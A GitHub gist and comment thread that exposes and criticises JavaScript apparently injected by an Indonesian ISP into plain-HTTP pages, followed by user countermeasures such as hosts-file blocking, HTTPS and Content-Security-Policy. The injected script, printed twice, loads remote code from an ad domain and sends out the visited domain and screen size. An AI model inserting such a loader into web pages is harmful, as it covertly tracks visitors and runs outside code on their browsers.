Skip to content

Instantly share code, notes, and snippets.

@donnykurnia
Last active June 29, 2022 04:35
Show Gist options
  • Star 18 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save donnykurnia/2356dad4119ce85d18d18708914c60e3 to your computer and use it in GitHub Desktop.
Save donnykurnia/2356dad4119ce85d18d18708914c60e3 to your computer and use it in GitHub Desktop.
Injection code from Telkom Indihome. This code will replace </body> at the end of webpage with the code below. The content may varied, but the main payload is loaded from cfs2.uzone.id
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnCgur28FUm401VrTNseDf2JlEA6ZiOk%2ffQK22KycK5kPdVDjpnejkM9P73Pe7Y6EuuaOitYkmzmKNO8RUzaFdaIXn6R7NkvKk9cKCHQzyvNXXPs%2bsueqLp2EKbC6X0Nu38%2fmvVexzHBsuqHkiQG%2bNd%2bm8E%2f1Gq6XVEDRBd4yBsks3piKPJIEbKaNRdQVxqlbqy5Bs6h0iSFn8zyf11ihllrf6ZNmrJse7MMGOa5Bg8V4gb29r7%2bHjvRblYlXTzoDaVMg79rr8%2fNSZ6ssVfsxi0UIiVvCjFalmdmUa4D3V21bRqM4cgubmchEbbS%2bil%2bkh%2bMxt3Lc4cILEYiziKexsYIRCUr4wR%2fPBUNQ0j4IIx1jEuAgOLeRdwvvw4aFM0V1i21bvKCvX8DaMIllnngEEJ09Ev%2fVl90I1UyrYKv6AaTOlPRBinecqub0KT%2flfLk3J5BMJsGhRjFCfISXqn01lRdvFPPMPwF0W10PRF8Of4%2feqOmNt6%2f1%2bIe66Xn2XLzyo%2fXuwHgr8%2fESw2BJ%2fexkP13jBCMQ6mGWGfQ671Tl0qDCRxz3%2fSr7a%2fgD3rwBAepraDryNlMplNKwfDkn1RshIR2yOHd%2fT9f%2bWyzvKgo2q%2bBVg19biKxt2MA%2b51lkpH9op3ufeUcUr06SkECqC57ZaT0Gy%2btFzIpw7WrVWNOUR2IagZkIGRtvs8fT78yLbMJYt7QL2KA1NeaqJ1oxvPiRhbpzwbaEvCh2IpkWW4arhunYT9DWgF1jaNRjn1c6n%2fzCUZvEw8o0sgvMEHBsLP0VK4Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
cfs2.uzone.id ip address is 180.250.66.131
You just need to block this ip address in your router firewall or PC firewall, and the ads will be gone.
Shame on you, Telkom Indonesia.
@brehehe
Copy link

brehehe commented Mar 9, 2018

it look appear only http page, nothing on secure page.
here's what i got

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mr%2fvRbdSFMrh4JdxivCWF5IBgEx%2b518i7w7ix2wtGE6suih3GpzKuQqX0W2%2bZA6JLybv6qXL9CV7ok8vF4B27hRvqA6FSBQunP8hpmmimv5AFTgJeP%2fO3kPpjLpoUd5kfvgm1H0NWW6TarYD%2fpSGv5lGv1OSQIPSh8CvyQrYKRRMRUFYkiwXm1Mbp1LgVMnM9tH3cV3NchDWWsbeTazb7vfZ%2b%2bFj3v1fIWakmhFSMoiFUmKwVGff9kh%2bMQNYrBYFMww4dRAVfW8vxYUXVmujTSFI7FE5jAbjIrGa9Ge8bTjZWpm2vZaKrKn31llH%2bAM1cRpRHfVHrzO2THwSZ5IPIyrIntbw8ZzT5wr9njSHdwzQEhIsFQXeeLgLC2nbouJdOoAFcxNz%2f2Jb1%2fVLtYCxikqjmv5dciCN%2bQuzMcsm7xo1ZDLn5mukwuOOKAF18RxSU5VW7SCrFax10cVS9D6GICQY748msuvJqe06ReNkpTAphjVp%2brdzKgaM%2bGZUfZtsHxT53UW0PZ5NiRUI1ZpffO0BxNZeU%2bpE%2fnfFoCa%2fxFxTxNMvcuMTPuQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

@damzaky
Copy link

damzaky commented Mar 10, 2018

is this actually legal? because if it's illegal, we can sue anytime

@rheeqp
Copy link

rheeqp commented Apr 23, 2018

illegal according to ITE Act article 32 paragraph (1). they changed electronic information when it was transmitted from server to client.

@gaibz
Copy link

gaibz commented May 25, 2018

That's stupid telkampret .. inject some error script into website that user visit ..
i've tried so many things to done with this .. but never get done with it ..

Only 1 solution is to use https instead http..

@Crescendo-BLYAT
Copy link

illegal but since this is govt owned then it's legalized internally...

and they can change the domain as the pleases as they technically control the domain registration...

@adisazhar123
Copy link

Wow. I've been wondering what that shit was. So it's from my ISP? Damn lol

@munanjar
Copy link

munanjar commented Dec 27, 2018

I have to delete (not using) tag /body and tag /html and Let the browser close the tag it self to prevent this from happening.

@AbuReyhan
Copy link

AbuReyhan commented Jan 3, 2019

I have to delete (not using) tag /body and tag /html and Let the browser close the tag it self to prevent this from happening.

halo mas, gimana cara ngatasi "p01.notifa.info" yg kedetect di avast versi gratis? http://prntscr.com/m2eq6p
notifnya 5 menit sekali. trima kasih

@martanto
Copy link

martanto commented Jan 4, 2019

@lucernae
Copy link

lucernae commented Jan 9, 2019

Yo, is this still a problem?

@DarisAlf
Copy link

DarisAlf commented Feb 20, 2019

A quick google search nets me with a ton of articles that this practice is taking all over the world. Worse yet I did not find any possible solutions whatsoever. I guess we have to endure our lives in this ugly capitalist world, unfortunately.

Consider yourselves lucky if you're using an antivirus that blocks this disaster.

@jessicael
Copy link

"p01.notifa.info" ini udah di auto-block sama antivirus ku (Bitdefender) and was detected as a phishing attempt wkwkwk. Gak repot deh.

@abdilahrf
Copy link

Sementara bisa pakai ini https://gist.github.com/abdilahrf/b63b6c0313d77fe2a51e18bfb4a8bb05

untuk linux tambahin di file /etc/hosts & windows /System32/drivers/etc/hosts

@fransallen
Copy link

They can changed the ip address whenever they want, so in case they did that:

  1. Just add cfs2.uzone.id to your /etc/hosts.
  2. Add cfs2.uzone.id to your adblock blacklisted filter.
  3. And if you manage for multiple environment (home, office, etc), use dedicated dns server, where you can manage by your own.

Be in control of your internet connection!

@krisnaw
Copy link

krisnaw commented Jun 9, 2019

Just add SSL

@donnykurnia
Copy link
Author

donnykurnia commented Jun 10, 2019

@krisnaw yes, if you are a webmaster, adding SSL will prevent your website from getting injected with ads. This gist is for ISP customers that cannot enforce all website to use https. We can still fight back by adding their ads domain into the blacklist.

@yasirharis
Copy link

Comment all tag html, head, body. browser will add it automatically.

sample:

<html> to <!--<html> -->
<head> to <!--<head>-->

so on

@f0x48
Copy link

f0x48 commented Oct 8, 2019

Yang penasaran apa aja data yang di ambil

  1. Website yang kamu kunjungi ( parameter domain )
  2. Resolusi layar kamu ( parameter sw dan sh )
  3. Cookie di website yang kalian kunjungi
Query string	
id	1
enc	9UwkxLgY9
params	4TtHaUQnUEiP6K/c5C582Am8lISurprAUlOO9Isbj7WdvGI1HwVrd0iTnkVaSNpWp8BVqbjH zdb68ukjSoIxldxgiv/egRUV1841vIHK7UWD0PkGGYzMJJ180SwNm1a1zo3F5TU5SrR2WE5vnn9TcHrSZnriovmGXGFnz9RhTJMnbdDBJ3VMSNlGB7xBcmDhL3PlKKCOGOou xGoRgX4 eOZEWWSZMmJPE/McBD91t1WutHPE4IRToImofbey U0a/0jukLAapg/cTC99YQiknBIfl0wxAiEuyX3GN5kN9acZC /h0a6Tp4BLJtjLm/zGBqcE3rLJ9IhbpUnemvmM4Qv3uTQXazkX bKi4vZfmXD6ktpA sJtW6y3oiTAzr6GHqr/GGPexxhqQR3oMBE2HOVOH190PwkCuzxAQb0CgmTYkDFWZ3 4XFQDuYK8g6L9X3Rm2ndpwGP5upVVzaVW9u/8U IC6/tNc4b8PTymNqu92VNmMAHwNidhU WngbkDutaSLVDqU5drfgcpO7VA==
idc_r	00000000
domain	www.example.com
sw	1390
sh	768

@antelove19
Copy link

antelove19 commented Dec 31, 2019

wow...

script vs script

The telkom script will replace </body> tag with their script, so we must prevent it with add pre comment tag before </body> tag

This script using jQuery, cause I use it for web

Before </body>, add this script:

        <script>

            $( function() {

                $(this).after("<!--") // the inject will be comment

            } );

        </script>

antelove.com

Join us, in dev.to

@maulvi
Copy link

maulvi commented Apr 19, 2020

the thing is no one in indonesia have enough balls to sue them.

@donnykurnia
Copy link
Author

@maulvi the justice system here is hopeless... most of the prosecutor and judges had no knowledge about internet technology. Plus, telkom had put the ads point into the subscription agreement.

@anggara-ts
Copy link

But according to this comment, it is not a mere ads if it steal our cookies. Can we report p01.notifa.info and cfs2.uzone.id as deceptive site (malware) here?

Adding those domains to /etc/hosts will only help us, not our web visitors.
Currently, adding SSL is the only clean option. I would not like to mess up my site's DOM by commenting out HTML tags.

@alghifari24
Copy link

alghifari24 commented Apr 24, 2020

It's quite simple, you have to do that with a Content-Security-Policy tag in the index.html
https://content-security-policy.com/

example :
<meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline' 'unsafe-eval' 'self' https://yourdomain.com/* http://yourdomain.com/*; img-src 'self' data: * blob:">

@fauzi-id
Copy link

you have to connect VPN and the ads gone.

@ifaniqbal
Copy link

Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?
image

@donnykurnia
Copy link
Author

@ifaniqbal harusnya tidak, karena saya coba test pakai curl, di hasilnya tidak ada tambahan injeksi iklan dari indihome

curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InRelease

Coba test sendiri di tempat kamu.

@ifaniqbal
Copy link

@ifaniqbal harusnya tidak, karena saya coba test pakai curl, di hasilnya tidak ada tambahan injeksi iklan dari indihome

curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InRelease

Coba test sendiri di tempat kamu.

Hasilnya:
curl: (56) Recv failure: Connection reset by peer

image

@donnykurnia
Copy link
Author

@ifaniqbal kemungkinan karrna setting firewall atau proxy yg digunakan

https://stackoverflow.com/a/10349895/141177

@maulvi
Copy link

maulvi commented Aug 12, 2021

Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?

saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy

@ifaniqbal
Copy link

@ifaniqbal kemungkinan karrna setting firewall atau proxy yg digunakan

https://stackoverflow.com/a/10349895/141177

Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?

saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy

Makasih @donnykurnia dan @maulvi. Saya tadi lapor via web indihome, laporannya "tidak bisa update Linux, repo berikut ini erro connection failed". Sudah diselesaikan oleh pihak telkom dengan memindahkan ke jaringan yang tidak "lemot".

Pihak telkom bilang, kalau dapat IP yang di bawah ..*.10 biasanya lemot. Saya dipindahkan ke IP 11 dan hasilnya lancar. Cek IP nya bisa via speedtest

image

Sekarang sudah bisa lancar sudo apt update

Hit:1 https://download.docker.com/linux/ubuntu hirsute InRelease
Hit:2 https://brave-browser-apt-release.s3.brave.com stable InRelease                                                                      
Hit:3 https://mirror.amscloud.co.id/ubuntu hirsute InRelease                                                                               
Hit:4 https://dl.winehq.org/wine-builds/ubuntu hirsute InRelease                                                                           
Hit:5 https://mirror.amscloud.co.id/ubuntu hirsute-security InRelease                                                                      
Hit:6 https://mirror.amscloud.co.id/ubuntu hirsute-updates InRelease                                                                       
Hit:7 https://mirror.amscloud.co.id/ubuntu hirsute-backports InRelease                                                                     
Hit:8 http://ppa.launchpad.net/linrunner/tlp/ubuntu hirsute InRelease                                                        
Hit:9 http://apt.pop-os.org/proprietary hirsute InRelease                                                                        
Hit:10 http://ppa.launchpad.net/system76/pop/ubuntu hirsute InRelease                                                            
Hit:11 https://download.sublimetext.com apt/stable/ InRelease                   
Hit:12 http://ppa.launchpad.net/ubuntuhandbook1/apps/ubuntu hirsute InRelease

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment